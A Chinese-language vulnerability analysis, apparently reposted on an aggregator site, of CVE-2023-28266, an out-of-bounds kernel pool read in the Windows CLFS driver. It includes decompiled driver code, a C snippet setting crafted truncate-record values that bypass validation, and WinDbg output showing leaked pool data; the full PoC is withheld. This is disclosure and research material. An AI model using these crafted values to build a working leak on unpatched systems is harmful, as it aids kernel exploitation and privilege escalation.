CLFS信息泄露漏洞CVE-2023-28266分析

news2025/1/19 20:24:58

引用

这篇文章的目的是介绍今年4月发布的CLFS信息泄露漏洞CVE-2023-28266分析.

文章目录

    • 引用
    • 简介
    • CVE-2023-28266漏洞分析
    • CVE-2023-28266调试过程
    • 漏洞复现
    • 相关引用
    • 参与贡献

简介

文章结合了逆向代码和调试结果分析了CVE-2023-28266漏洞利用过程和漏洞成因.

CVE-2023-28266漏洞分析

CVE-2023-28266是笔者今年1月提交的一个关于CLFS文件系统驱动程序的信息泄露漏洞,漏洞公告发布于今年4月.信息泄露类型的漏洞属于间接利用类型并不能直接导致权限提升的结果,以普通用户触发漏洞可以实现内核态内存的越界读取,最终将泄露的数据写入CLFS容器文件(BLF格式)中,并在控制台输出中提供展示泄露的数据内容.
关于CLFS模块的基础知识读者可以查看相关引用节中的文章获取里面有详细介绍,请读者自行研究,本文只讨论CVE-2023-28266的相关利用细节.
CVE-2023-28266与其他CLFS漏洞中的符号表相关的关联数据关系不大,只存在于一个截断日志相关的过程调用中,下面我们来具体分析一下.
漏洞存在于一个名为的CClfsLogFcbPhysical::TruncateLogModifyStreams函数中,触发该函数需要增加一个Truncate Record的元数据块(Metadata Block),大小0x2800在最后一个元数据块后.从字面量分析来看这个元数据块的作用应该是用来截断clfs文件指定扇区数据到容器文件的作用.从逆向分析来看我们得到了一个结构体_CLFS_SECTOR_CHANGE用于表示需要截断的扇区的数据结构,截断数据存在于rgbSector字段大小为一个默认扇区大小也就是0x200.具体逆向结果如下:

typedef struct __declspec(align(2)) _CLFS_SECTOR_CHANGE
{
	ULONG iSector;
	ULONG ulUnused;
	BYTE rgbSector[0x200];
}CLFS_SECTOR_CHANGE,*PCLFS_SECTOR_CHANGE;
typedef struct __declspec(align(8)) _CLFS_TRUNCATE_CLIENT_CHANGE
{
    CLFS_CLIENT_ID cidClient;
    CLFS_LSN lsn;
    CLFS_LSN lsnClient;
    CLFS_LSN lsnRestart;
    USHORT cLength;
    USHORT cOldLength;
    ULONG cSectors;
    CLFS_SECTOR_CHANGE rgSectors[0xb];
}CLFS_TRUNCATE_CLIENT_CHANGE, * PCLFS_TRUNCATE_CLIENT_CHANGE;
__int64 __fastcall CClfsLogFcbPhysical::TruncateLogModifyStreams(CClfsLogFcbPhysical *this, _CLFS_LOG_BLOCK_HEADER *loghdr, struct _CLFS_TRUNCATE_CONTEXT *trunctx, struct _CLFS_TRUNCATE_RECORD_HEADER *trunhdr)
{
//vulnerability code
struct _CLFS_LOG_BLOCK_HEADER * hdr = ExAllocatePoolWithTag(PagedPool, (unsigned __int64)chg->cLength << 9, 'sflC');
(_CLFS_TRUNCATE_RECORD_HEADER *) crdhdr =(&that->field_rgBlocks_30[4].pbImage->MajorVersion
                                                          + crawlast->RecordOffsets[0]);														  
CLFS_TRUNCATE_CLIENT_CHANGE * chg = (char *)crdhdr + crdhdr->coffClientChange_8);
while ( 1 )
  {
    nowlsn = idx;
    if ( idx >= chg->cLength )
      break;
    trunctx = (struct _CLFS_TRUNCATE_CONTEXT *)(0x208i64 * idx);
    if ( idx != *(ULONG *)((char *)&chg->rgSectors[0].iSector + (_QWORD)trunctx) )
      goto error;
    loghdr = &hdr[idx];
    rgbSector = (CLFS_SECTOR_CHANGE *)((char *)chg->rgSectors + (_QWORD)trunctx + 8);
    val4 = 4i64;
    do
    {
      *(_OWORD *)&loghdr->MajorVersion = *(_OWORD *)&rgbSector->iSector;
      *(_OWORD *)&loghdr->Flags = *(_OWORD *)&rgbSector->rgbSector[8];
      *(_OWORD *)&loghdr->NextLsn.offset.idxRecord = *(_OWORD *)&rgbSector->rgbSector[24];
      *(_OWORD *)&loghdr->RecordOffsets[2] = *(_OWORD *)&rgbSector->rgbSector[40];
      *(_OWORD *)&loghdr->RecordOffsets[6] = *(_OWORD *)&rgbSector->rgbSector[56];
      *(_OWORD *)&loghdr->RecordOffsets[10] = *(_OWORD *)&rgbSector->rgbSector[72];
      *(_OWORD *)&loghdr->RecordOffsets[14] = *(_OWORD *)&rgbSector->rgbSector[88];
      loghdr = (_CLFS_LOG_BLOCK_HEADER *)((char *)loghdr + 0x80);
      *(_OWORD *)&loghdr[-1].glag[384] = *(_OWORD *)&rgbSector->rgbSector[0x68];
      rgbSector = (_CLFS_SECTOR_CHANGE *)((char *)rgbSector + 0x80);
      --val4;
    }
    while ( val4 );
    ++idx;
  }
 //泄露的数据最终会通过CClfsLogFcbPhysical::WriteOneRawSectorSync写入容器文件
 Hresult  hr = CClfsLogFcbPhysical::WriteOneRawSectorSync(that, &v44, &v42, &hdr[lsnidx].MajorVersion, &chg->lsn, 1, v5); 
} 

触发截断日志扇区功能函数需首先要设置控制元数据块(Control Record)PCLFS_CONTROL_RECORD->cxTruncate.eTruncateState = ClfsTruncateStateModifyingStream,在进入这个函数前存在一个_CLFS_TRUNCATE_CLIENT_CHANGE结构体用于表示需要截断扇区个数chg->cLength,CLFS会根据这个指定的个数分配非分页缓冲区大小chg->cLength<<9也就是chg->cLength*0x200用于存放将要截断的扇区数据,从当前元数据块加上coffClientChange偏移量得到拷贝的基址写入缓冲区中,这里并没有对实际的Truncate Record的元数块据中指定扇区数据数量进行校验,导致可以越界读取到最后一个扇区的下一个扇区数据到缓冲区中,也就是说泄露下个内核池中的0x200大小的数据.一般情况下非分页池相邻的数据块都是有数据的,所以越界读取并不会导致BSOD.所有缓冲区的数据最后都会在CClfsLogFcbPhysical::WriteOneRawSectorSync写入CLFS容器文件,所以读取泄露数据对于调用者来说是可行的.

typedef struct _CLFS_TRUNCATE_RECORD_HEADER
{
	CLFS_METADATA_RECORD_HEADER hdrBaseRecord;
	ULONG coffClientChange;
	ULONG coffOwnerPage;
} CLFS_TRUNCATE_RECORD_HEADER, * PCLFS_TRUNCATE_RECORD_HEADER;
__int64 __fastcall CClfsBaseFilePersisted::AcquireTruncateContext(CClfsBaseFilePersisted *this, unsigned int *val1, struct _CLFS_TRUNCATE_CONTEXT **trunctxret, _CLFS_TRUNCATE_RECORD_HEADER **offset, unsigned int *deleta)
{
     hr = CClfsBaseFile::AcquireMetadataBlock(this, 4i64, (__int64)v14, v15);
     hr = RtlULongSub(
             this->field_rgBlocks_30[4].pbImage->SignaturesOffset,
             this->field_rgBlocks_30[4].pbImage->RecordOffsets[0],
             deleta);         
	  *offset = (_CLFS_TRUNCATE_RECORD_HEADER *)(&this->field_rgBlocks_30[4].pbImage->MajorVersion
											   + crawlast->RecordOffsets[0]);
	  ctrlrcdref = ctrlrcd;
	  //判断eTruncateState是不是ClfsTruncateStateModifyingStream,然后进入CClfsLogFcbPhysical::TruncateLogModifyStreams
	  *trunctxret = &ctrlrcd->cxTruncate;
}
//offset=CClfsBaseFilePersisted::AcquireTruncateContext参数deleta
unsigned __int8 __fastcall CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid(CClfsLogFcbPhysical *this, _CLFS_TRUNCATE_RECORD_HEADER *trunhdr, unsigned int offset)
{
  unsigned int offOwnerPage; // ecx
  unsigned int offClientChange; // edx
  bool chk1; // cf
  bool chk2; // zf

  offOwnerPage = trunhdr->coffOwnerPage_c;
  if ( offOwnerPage < 0x10 )
    return 0;
  offClientChange = trunhdr->coffClientChange_8;
  if ( offClientChange < 0x10
    || offOwnerPage > offset
    || offClientChange > offset
    || offClientChange == offOwnerPage
    || offset - offOwnerPage < 0x1000
    || offset - offClientChange < 0x230 )
  {
    return 0;
  }
  chk1 = offOwnerPage < offClientChange;
  chk2 = offOwnerPage == offClientChange;
  if ( offOwnerPage < offClientChange )
  {
    if ( offClientChange - offOwnerPage < 0x1000 )
      return 0;
    chk1 = offOwnerPage < offClientChange;
    chk2 = offOwnerPage == offClientChange;
  }
  if ( chk1 || chk2 || offOwnerPage - offClientChange >= 0x230 )
    return 1;
  return 0;
}	 
__int64 __fastcall CClfsLogFcbPhysical::ValidateTruncateRecord(CClfsLogFcbPhysical *this, struct _CLFS_TRUNCATE_RECORD_HEADER *hdr)
{
  __int64 offClientChange; // rax
  unsigned __int64 offOwnerPage; // r9
  CLFS_TRUNCATE_CLIENT_CHANGE *chg; // r8
  __int64 chg_cLength; // rax
  __int64 result; // rax

  offClientChange = hdr->coffClientChange_8;
  if ( offClientChange & 7
    || (offOwnerPage = hdr->coffOwnerPage_c, offOwnerPage & 7)
    || (chg = (CLFS_TRUNCATE_CLIENT_CHANGE *)((char *)hdr + offClientChange),
        chg_cLength = *(unsigned __int16 *)((char *)&hdr[2]+ offClientChange).cLength,
        chg->cSectors != (_DWORD)chg_cLength)
    || chg->cOldLength < (unsigned __int16)chg_cLength
    || chg->rgSectors[0].iSector
    || 0x208 * chg_cLength > offOwnerPage
    || chg->cidClient >= 0x7Cu )
  {
    result = 3222929421i64;
  }
  else
  {
    result = 0i64;
  }
  return result;
}
__int64 __fastcall ClfsDecodeBlockPrivate(_CLFS_LOG_BLOCK_HEADER *a1, unsigned int SectorCount, char sig, unsigned __int8 a4, unsigned int *a5)
{
    if ( (int)ULongAdd(SignaturesOffset, 2 * SectorCount, &plus) < 0 || (v11 & 7) != 0 || plus > blocksize )
    return 0xC01A000Ai64;
}

漏洞触发的整个调用过程首先根据Client符号表的cidClient获取TruncateContext上下文,所在元数据块大小0x2800,其实在这个函数之后确实存在对当前元数据块的CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid进行第一步校验,判断CLFS_TRUNCATE_CONTEXT->eTruncateState是不是ClfsTruncateStateModifyingStream,然后进入CClfsLogFcbPhysical::TruncateLogModifyStreams对TruncateContext进行第二步校验,在CClfsLogFcbPhysical::ValidateTruncateRecord函数中.这里笔者总结出了一个绕过方式方法如下:逆向代码显示IsTruncatedRecordOffsetValid的参数offset来自与元数据块的SignaturesOffset+RecordOffsets[0]=27d0值,可以理解为这个值接近于整个元数据库块的结尾,因为一般情况下Signature会从最后一个扇区直到写入位于每个扇区的结尾,第一步校验经过排除法计算得出chk1 = offOwnerPage < offClientChange;
和 chk2 = offOwnerPage == offClientChange这2个都不能让它成立,参数offset位于整个元数据块长度减去0x30字节处,为了让offset - offOwnerPage < 0x1000且offset - offClientChange < 0x230不成立,只能让offOwnerPage - offClientChange >= 0x230成立,得出结论offset减去offOwnerPage和offClientChange都只能大于0x1000,而且它们的差值需要大于0x230,那么offClientChange就必须小于offset-1000-230值,采用0x1750- 0x238=1518可以是个合适的值.在第二步校验中0x208 * chg_cLength > offOwnerPage所以offOwnerPage必须大于0x2089=1248采用0x1750也符合要求;为什么采用TruncateContext元数据块大小0x2800原因是offClientChange=1518,0x2800-1518-70=1278,转换成扇区个数1278/208=9正好是9个,通过加减8个字节的微调让这些符号的边界都和扇区对齐,让最后一个PCLFS_SECTOR_CHANGE扇区的边界(90x208=1248)正好落在整个TruncateContext元数据块的结尾,1248+70+1518+sizeof(CLFS_TRUNCATE_CLIENT_CHANGE)=27f8(约等于2800).而越界读取没有对PCLFS_TRUNCATE_CLIENT_CHANGE->cLength进行校验导致读取数据越过了元数据块的边界,这里SignaturesOffset需要被clfs写入签名值,所以必须让他落在拷贝扇区数据的内存区域要不然会污染符号表的数据,在ClfsDecodeBlockPrivate中对这个值和CLFS_LOG_BLOCK_HEADER->TotalSectorCount组合也有校验需要绕过,笔者用的合适的SignaturesOffset值是元数据块大小TruncateContextlength-0x30.完整的绕过方法构造合适的值如下.

 int TruncateContextlength = 0x2800;
   hd->SignaturesOffset = TruncateContextlength - 0x30;
   ULONGLONG trunc_record_ptr = (ULONGLONG)hd + hd->RecordOffsets[0];
   PCLFS_TRUNCATE_RECORD_HEADER trunhdr = (PCLFS_TRUNCATE_RECORD_HEADER)trunc_record_ptr;
   //size=10
   ULONG idx = 0xa;
   trunhdr->coffOwnerPage = 0x1750;
   //0x1750- 0x238=1518+70=1588
   trunhdr->coffClientChange = 0x1750 - 0x238;
   PCLFS_TRUNCATE_CLIENT_CHANGE trunchg = (PCLFS_TRUNCATE_CLIENT_CHANGE)(trunc_record_ptr + trunhdr->coffClientChange);
   trunchg->cSectors = idx;
   trunchg->cLength = idx;
   trunchg->cOldLength = 0x20;
   trunchg->cidClient = 0;
   //1588+28+*(208*9)
   for (int i = 0; i < idx; i++)
   {
   	trunchg->rgSectors[i].iSector = i;
   }
   PCLFS_LOG_BLOCK_HEADER hdr = (PCLFS_LOG_BLOCK_HEADER)(&trunchg->rgSectors[0].rgbSector[0]);
   memcpy(hdr, hd, 0x200);
   hdr->TotalSectorCount = idx;
   hdr->ValidSectorCount = idx;
   hdr->Flags = 0;
   hdr->SignaturesOffset = (idx << 9) - 0x20;
   *(USHORT*)((ULONGLONG)hd + 0x200 - 2) = 0x0150;
   for (int i = 0x400; i < TruncateContextlength; i += 0x200)
   {
   	*(USHORT*)((ULONGLONG)hd + i - 2) = 0x0110;
   }
   *(USHORT*)((ULONGLONG)hd + TruncateContextlength - 2) = 0x0130;
   return (BYTE*)trunchg;

CVE-2023-28266调试过程

下面我们来看调试过程

8: kd> bp CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x127 ".if(rax==9){.echo found}.else{gc}"
breakpoint 0 hit
2: kd> r
rax=0000000000000009 rbx=0000000000000000 rcx=0000000000000009
rdx=ffff8b03d81ac200 rsi=ffff8b03d449d588 rdi=ffffa286d513e000
rip=fffff8076b76d74f rsp=fffff90c5c4c6f40 rbp=fffff90c5c4c7720
 r8=0000000000000000  r9=0000000000000080 r10=0000000000001001
r11=ffffa286d00d0000 r12=0000000000000000 r13=0000000000000200
r14=ffff8b03d81ab000 r15=ffffa286d5a7c960
iopl=0         nv up ei ng nz ac po cy
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040297
CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x127:
fffff807`6b76d74f 4c69c008020000  imul    r8,rax,208h
2: kd> !pool ffff8b03d449d588
Pool page ffff8b03d449d588 region is Paged pool

ffff8b03d449c000 doesn't look like a valid small pool allocation, checking to see
if the entire page is actually part of a large page allocation...

*ffff8b03d449c000 : large page allocation, tag is Clfs, size is 0x2800 bytes
		Pooltag Clfs : CLFS General buffer, or owner page lookaside list, Binary : clfs.sys	
2: kd> r
8: kd> bp CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x14e
//末尾 CLFS_SECTOR_CHANGE 在位置 27f8+8=2800  rax 寄存器位于下个pool;
Breakpoint 1 hit
2: kd> r
rax=ffff8b03d449e800 rbx=0000000000000000 rcx=0000000000000009
rdx=ffff8b03d81ac200 rsi=ffff8b03d449d588 rdi=ffffa286d513e000
rip=fffff8076b76d776 rsp=fffff90c5c4c6f40 rbp=fffff90c5c4c7720
 r8=0000000000000004  r9=0000000000000080 r10=0000000000001001
r11=ffffa286d00d0000 r12=0000000000000000 r13=0000000000000200
r14=ffff8b03d81ab000 r15=ffffa286d5a7c960
iopl=0         nv up ei ng nz ac po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040296
CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x14e:
fffff807`6b76d776 0f1000          movups  xmm0,xmmword ptr [rax] ds:002b:ffff8b03`d449e800=ffff8b030000018ba0cb3280f59f0e82
2: kd> !pool ffff8b03d449e800
Pool page ffff8b03d449e800 region is Paged pool
 ffff8b03d449e810 size:  7c0 previous size:    0  (Allocated)  Toke
2: kd> ?ffff8b03d449e800-ffff8b03d449c000
Evaluate expression: 10240 = 00000000`00002800
//查看越界读取信息
2: kd> db ffff8b03d449e800
ffff8b03`d449e800  82 0e 9f f5 80 32 cb a0-8b 01 00 00 03 8b ff ff  .....2..........
ffff8b03`d449e810  00 6f 7c 03 54 6f 6b 65-08 a7 0e dc 03 8b ff ff  .o|.Toke........
ffff8b03`d449e820  00 10 00 00 5c 07 00 00-7c 00 00 00 00 00 00 00  ....\...|.......
ffff8b03`d449e830  c0 38 85 6c 07 f8 ff ff-00 00 00 00 00 00 00 00  .8.l............
ffff8b03`d449e840  08 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffff8b03`d449e850  00 00 00 00 00 00 00 00-14 00 08 02 00 00 00 00  ................
ffff8b03`d449e860  c0 38 85 6c 07 f8 ff ff-e9 1d b4 da 03 8b ff ff  .8.l............
ffff8b03`d449e870  41 64 76 61 70 69 20 20-ab 5c 21 00 00 00 00 00  Advapi  .\!.....
8: kd> bp CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x3d3
Breakpoint 2 hit
5: kd> r
rax=fffff90c5c4c6fa8 rbx=0000000000000000 rcx=ffffa286d513e000
rdx=fffff90c5c4c6fb0 rsi=0000000000000000 rdi=ffffa286d513e000
rip=fffff8076b76d9fb rsp=fffff90c5c4c6f40 rbp=fffff90c5c4c7720
 r8=fffff90c5c4c6fa0  r9=ffff8b03d81ab000 r10=ffff8b03d81ab000
r11=ffff8b03d81ac3f4 r12=000000000000000a r13=0000000000000200
r14=ffff8b03d81ab000 r15=ffffa286d5a7c960
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00040286
CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x3d3:
fffff807`6b76d9fb e8ec1a0000      call    CLFS!CClfsLogFcbPhysical::WriteOneRawSectorSync (fffff807`6b76f4ec)
//r9是目标写入缓冲区,越界的偏移位置是0x1200 ,泄露信息一直.
5: kd> db ffff8b03d81ab000+1200
ffff8b03`d81ac200  82 0e 9f f5 80 32 cb a0-8b 01 00 00 03 8b ff ff  .....2..........
ffff8b03`d81ac210  00 6f 7c 03 54 6f 6b 65-08 a7 0e dc 03 8b ff ff  .o|.Toke........
ffff8b03`d81ac220  00 10 00 00 5c 07 00 00-7c 00 00 00 00 00 00 00  ....\...|.......
ffff8b03`d81ac230  c0 38 85 6c 07 f8 ff ff-00 00 00 00 00 00 00 00  .8.l............
ffff8b03`d81ac240  08 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffff8b03`d81ac250  00 00 00 00 00 00 00 00-14 00 08 02 00 00 00 00  ................
ffff8b03`d81ac260  c0 38 85 6c 07 f8 ff ff-e9 1d b4 da 03 8b ff ff  .8.l............
ffff8b03`d81ac270  41 64 76 61 70 69 20 20-ab 5c 21 00 00 00 00 00  Advapi  .\!.....
//栈回溯
2: kd> kv
 # Child-SP          RetAddr               : Args to Child                                                           : Call Site
00 ffff9e0f`95883f80 fffff801`382cd0c3     : ffffde86`1f9a8000 00000000`0000000a ffffaf87`0ca1c0d8 ffffaf87`0ca1c001 : CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x14e
01 ffff9e0f`95884050 fffff801`382aa1ba     : 00000000`00000000 ffffde86`21c44820 ffffde86`1f9a8000 ffffde86`1f9a8000 : CLFS!CClfsLogFcbPhysical::TruncateLog+0x8b
02 ffff9e0f`958840a0 fffff801`382722a9     : ffffde86`1f9a8000 ffffde86`21c44820 00000000`00002760 ffffaf87`0ca1c0d8 : CLFS!CClfsLogFcbPhysical::RecoverTruncateLog+0xae
03 ffff9e0f`95884100 fffff801`382a0d13     : ffffde86`1f9a8000 ffffde86`1f9a8038 ffffde86`1bef8a40 ffffde86`0012019f : CLFS!CClfsLogFcbPhysical::Initialize+0x80d
04 ffff9e0f`95884240 fffff801`382a276b     : ffffde86`1f978c70 00000000`00000001 00000000`00000007 fffff801`382a0000 : CLFS!CClfsRequest::Create+0x4ef
05 ffff9e0f`95884390 fffff801`382a2537     : ffffde86`1f978c70 ffff9e0f`95884588 ffffde86`18dcbd60 00000000`0012019f : CLFS!CClfsRequest::Dispatch+0x97
06 ffff9e0f`958843e0 fffff801`382a2487     : ffffde86`1f976b30 ffffde86`1f976b30 ffffde86`21c46668 00000000`000000c0 : CLFS!ClfsDispatchIoRequest+0x87
07 ffff9e0f`95884430 fffff801`3a22a715     : ffffde86`18dcbd60 00000000`6d4e6f49 ffffde86`1f0c3010 00000000`00000000 : CLFS!CClfsDriver::LogIoDispatch+0x27
08 ffff9e0f`95884460 fffff801`3a22bd14     : 00000000`00000003 ffffde86`1f976b30 00000000`6d4e6f49 fffff801`3a22b943 : nt!IofCallDriver+0x55
09 ffff9e0f`958844a0 fffff801`3a61acdd     : ffff9e0f`95884760 ffffde86`18dcbd60 ffffde86`21c46668 ffffde86`00000000 : nt!IoCallDriverWithTracing+0x34
0a ffff9e0f`958844f0 fffff801`3a602c0e     : ffffde86`18dcbd60 00000000`000000bd ffffde86`1bef8a20 ffffde86`1bef8a01 : nt!IopParseDevice+0x117d
0b ffff9e0f`95884660 fffff801`3a62d96a     : ffffde86`1bef8a00 ffff9e0f`958848c8 00007ffa`00000040 ffffde86`17ee0e80 : nt!ObpLookupObjectName+0x3fe
0c ffff9e0f`95884830 fffff801`3a677b9f     : 00000000`00000000 000000c7`748ff890 00000000`00000000 00000000`00000001 : nt!ObOpenObjectByNameEx+0x1fa
0d ffff9e0f`95884960 fffff801`3a677779     : 000000c7`748ff810 ffff9e0f`95884b80 000000c7`748ff890 000000c7`748ff880 : nt!IopCreateFile+0x40f
0e ffff9e0f`95884a00 fffff801`3a40caf5     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`08f0d180 : nt!NtCreateFile+0x79
0f ffff9e0f`95884a90 00007ffa`1efedb64     : 00007ffa`17a820a5 00000000`00000000 00000000`00000000 00000000`00008004 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff9e0f`95884b00)
10 000000c7`748ff798 00007ffa`17a820a5     : 00000000`00000000 00000000`00000000 00000000`00008004 00000000`00000003 : ntdll!NtCreateFile+0x14
11 000000c7`748ff7a0 00000000`00000000     : 00000000`00000000 00000000`00008004 00000000`00000003 00000000`00000000 : 0x00007ffa`17a820a5

设置第一个断点bp CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x127 “.if(rax==9){.echo found}.else{gc}”;
当迭代到拷贝第9个扇区数据时候,可以看到rsi指向当前TruncateContext指向元数据块内存区域,大小2800也就是拷贝的起始地址,再次下第二个断点bp CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x14e发现rax=ffffde86f13e4800减去TruncateContext基址正好是0x2800,说明这次拷贝的起始地址已经到了当前pool的末尾,也就是说会越界拷贝一个扇区0x200大小的数据内容.
下第三个断点bp CLFS!CClfsLogFcbPhysical::TruncateLogModifyStreams+0x3d3,调用CLFS!CClfsLogFcbPhysical::WriteOneRawSectorSync函数r9指向要写入容器文件的全部缓冲区地址正好是9*0x200=0x1200;查看db ffff8b03d81ab000+1200数据内容得出的结论是与上一步越界读取rax指向的泄露信息内容是相同的.
接下来调用者就可以通过读取容器通过CLFS_TRUNCATE_CLIENT_CHANGE->lsn获取容器的符号表中对应容器默认第0个是CLFSCON01文件,在偏移量1200数据内容展示泄露信息,读取方法与读取普通文件相同,这里不再赘述.至此完成整个漏洞的利用过程.

漏洞复现

出于安全原因笔者不能提供完整的poc代码,下图是笔者在打了1月补丁的Windows1021h2虚拟机上成功复现了CVE-2023-28266

查看大图

相关引用

clfs逆向工程文档

CVE-2023-28252红雨滴分析

CVE-2023-28252安全客分析

CVE-2023-28252谷歌P0分析

CVE-2023-28252分析

CVE-2023-28252看雪分析2

CVE-2023-28252看雪分析2

CVE-2023-28252的poc

CVE-2022-24521分析第一篇

CVE-2022-24521分析第二篇

CVE-2022-24521分析第三篇

CVE-2022-24521分析第三篇原文

CVE-2022-3022分析

CVE-2022-24521分析谷p0

CVE-2022-37969分析第一部分

CVE-2022-37969分析第二部分

CVE-2022-37969分析中文第一篇

CVE-2023-28266漏洞致谢

参与贡献

作者来自ZheJiang Guoli Security Technology,邮箱cbwang505@hotmail.com

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/967025.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

两个线程同步执行:解决乱箭穿心(STL/Windows/Linux)

C自学精简教程 目录(必读) C并发编程入门 目录 多线程同步 线程之间同步是指线程等待其他线程执行完某个动作之后再执行&#xff08;本文情况&#xff09;。 线程同步还可以是像十字路口的红绿灯一样&#xff0c;只允许一个方向的车同行&#xff0c;其他方向的车等待。 本…

UART串口Shell软硬件模型分析总结

文章目录 层次一、最底层逻辑配置交互----如何从Uart硬件读写单个字节数据层次二、抽象串口软件模块交互----基于串口对接输入输出流 和 Printf适配层次三、类似Shell封装抽象交互----基于串口交互命令行界面&#xff08;命令解析、补全、修改、记录&#xff09;case1 依次输入…

自建音乐服务器Navidrome之一

这里写自定义目录标题 1.1 官方网站 2. Navidrome 简介2.1 简介2.2 特性 3. 准备工作4. 视频教程5. 界面演示5.1 初始化页5.2 专辑页 前言 之前给大家介绍过 Koel 音频流服务&#xff0c;就是为了解决大家的这个问题&#xff1a;下载下来的音乐&#xff0c;只能在本机欣赏&…

上海的正西边有哪些城市

背景 上海一路向西&#xff0c;来一趟拉萨之行&#xff0c;那么上海出现&#xff0c;所经过的那么多城市&#xff0c;哪些是在上海的正西边呢&#xff1f; 画一幅地图 基于这个背景需求&#xff0c;我们需要拿来一幅地图&#xff0c;一看便知。下面的python代码生成了一幅地…

通信原理板块——平稳随机过程

微信公众号上线&#xff0c;搜索公众号小灰灰的FPGA,关注可获取相关源码&#xff0c;定期更新有关FPGA的项目以及开源项目源码&#xff0c;包括但不限于各类检测芯片驱动、低速接口驱动、高速接口驱动、数据信号处理、图像处理以及AXI总线等 1、平稳随机过程的定义 (1)严平稳随…

UE4 显示遮挡物体

SceneDepth是你相机能够看见的物体的深度距离 CustomDepth是你相机包括看不见被遮挡的物体的深度距离 如果CustemDepth比SceneDepth的距离相等&#xff0c;那么就是没有被遮挡的物体&#xff0c;如果被遮挡那么就是CustemDepth比SceneDepth深度距离远&#xff0c;然后再做对应…

PYTHON知识点学习-循环语句

&#x1f680;write in front&#x1f680; &#x1f50e;大家好&#xff0c;我是Aileen★。希望你看完之后&#xff0c;能对你有所帮助&#xff0c;不足请指正&#xff01;共同学习交流&#x1f50e; &#x1f194;本文由 Aileen_0v0★ 原创 CSDN首发&#x1f412; 如需转载还…

【机器学习】线性回归

Model Representation 1、问题描述2、表示说明3、数据绘图4、模型函数5、预测总结附录 1、问题描述 一套 1000 平方英尺 (sqft) 的房屋售价为300,000美元&#xff0c;一套 2000 平方英尺的房屋售价为500,000美元。这两点将构成我们的数据或训练集。面积单位为 1000 平方英尺&a…

Swift 如何从图片数据(Data)检测原图片类型?

功能需求 如果我们之前把图片对应的数据(Data)保持在内存或数据库中,那么怎么从 Data 对象检测出原来图片的类型呢? 如上图所示:我们将 11 张不同类型的图片转换为 Data 数据,然后从 Data 对象正确检测出了原图片类型。 目前,我们的代码可以检测出 jpeg(jpg), tiff,…

WebRTC 安全之一

WebRTC 的安全需要满足三个基本需求 Authentication 用户访问需要认证Authorization 用户访问需要授权Audit 用户的访问应该可被追踪和审查 其中前两项也可以归结为 CIA Confidentiality 机密性&#xff1a;信息需要保密&#xff0c; 访问权限也需要控制Integrity 完整性&#…

Spring Cloud集成Nacos配置中心/注册中心

Spring Cloud版本 2021.0.5 Spring Cloud Alibaba版本 2021.0.5.0 Spring Boot版本 2.7.10 pom文件 需要放在依赖管理的pom文件 <dependencyManagement><dependencies><!-- spring boot依赖 --><dependency><groupId>org.springframewor…

2023-9-3 试除法判定质数

题目链接&#xff1a;试除法判定质数 #include <iostream>using namespace std;bool is_prime(int n) {if(n < 2) return false;for(int i 2; i < n / i; i){if(n % i 0) return false;}return true; }int main() {int n;cin >> n;while(n--){int x;cin &g…

git大文件推送报错

报错信息 不多掰扯&#xff0c;直接上报错信息和截图 Delta compression using up to 8 threadsRPC failde; HTTP 413 curl 22 The requested URL returned error: 413 Request Entity Too Large从以上的报错信息不难看出推送仓库的时候&#xff0c;请求体过大&#xff0c;为…

C++ do...while 循环

不像 for 和 while 循环&#xff0c;它们是在循环头部测试循环条件。do…while 循环是在循环的尾部检查它的条件。 do…while 循环与 while 循环类似&#xff0c;但是 do…while 循环会确保至少执行一次循环。 语法 C 中 do…while 循环的语法&#xff1a; do {statement(s…

AD16 基础应用技巧(一些 “偏好“ 设置)

1. 修改铺铜后自动更新铺铜 AD16 铺铜 复制 自动变形 偏好设置 将【DXP】中的【参数选择】。 将【PCB Editor】中的【General】&#xff0c;然后勾选上【Repour Polygons After Modification】。 2. PCB直角走线处理与T型滴泪 一些没用的AD技巧——AD PCB直角走线处理与…

iOS练手项目知识点汇总

基础理解篇 Objective-C是一种面向对象的编程语言&#xff0c;它支持元编程。元编程是指编写程序来生成或操纵其他程序的技术。 Objective-C中&#xff0c;元编程可以使用Objective-C的动态特性来实现。例如可以使用Objective-C的运行时函数来动态地创建类、添加属性和方法等等…

给视频添加背景图片,让它们更具魅力!

想要让你的视频更加出彩吗&#xff1f;给它们添加背景图片是不错的选择&#xff01;但是&#xff0c;如何做到呢&#xff1f;不用担心&#xff0c;我们的视频剪辑高手可以帮助你轻松实现&#xff01;我们提供多种背景图片选择&#xff0c;你可以根据自己的喜好和需求进行选择。…

程序员自由创业周记#7:仲裁

没想到 没想到写的周记会有这么多人看&#xff0c;还能收到这么多陌生(或熟悉)朋友的真诚建议、鼓励、甚至是打赏&#xff0c;几乎所有的评论和私信我都认真的回复了&#xff0c;本想的是通过网友和朋友的监督坚定我创业的信念&#xff0c;有点外界压力也能迫使自己持续输出一…

P1886 滑动窗口 /【模板】(双端队列)+双端队列用法

